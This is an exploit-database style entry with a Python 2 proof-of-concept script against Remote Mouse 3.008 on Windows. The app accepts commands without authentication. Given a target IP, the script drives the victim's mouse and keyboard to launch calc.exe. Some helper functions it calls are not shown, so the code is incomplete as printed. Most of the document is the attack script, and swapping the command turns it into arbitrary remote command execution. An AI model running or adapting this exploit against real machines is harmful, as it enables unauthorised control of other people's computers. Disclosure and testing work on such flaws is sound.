Exploits / Vulnerability Discovered : 2019-04-15 |
Type : remote |
Platform : windows
[+] Code ...
# Exploit Title: Remote Mouse 3.008 - Failure to Authenticate
# Date: 2019-09-04
# Exploit Author: 0rphon
# Software Link: https://www.remotemouse.net/
# Version: 3.008
# Tested on: Windows 10
Remote Mouse 3.008 fails to check for authenication and will execute any command any machine gives it
This script pops calc as proof of concept (albeit a bit slowly)
It also has an index of the keycodes the app uses to communicate with the computer if you want to mess around with it yourself
#!/usr/bin/python2
from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM
from time import sleep
from sys import argv
def PopCalc(ip):
MoveMouse(-5000,3000,ip)
MousePress(mouse.leftClick,ip)
sleep(1)
SendString("calc.exe",ip)
sleep(1)
SendString("\n",ip)
print("SUCCESS! Process calc.exe has run on target",ip)
def main():
try:
targetIP=argv[1]
except:
print("ERROR: You forgot to enter an IP! example: exploit.py 10.0.0.1")
exit()
if Ping(targetIP)==True:
PopCalc(targetIP)
else:
print("ERROR: Target machine is not running RemoteMouse")
exit()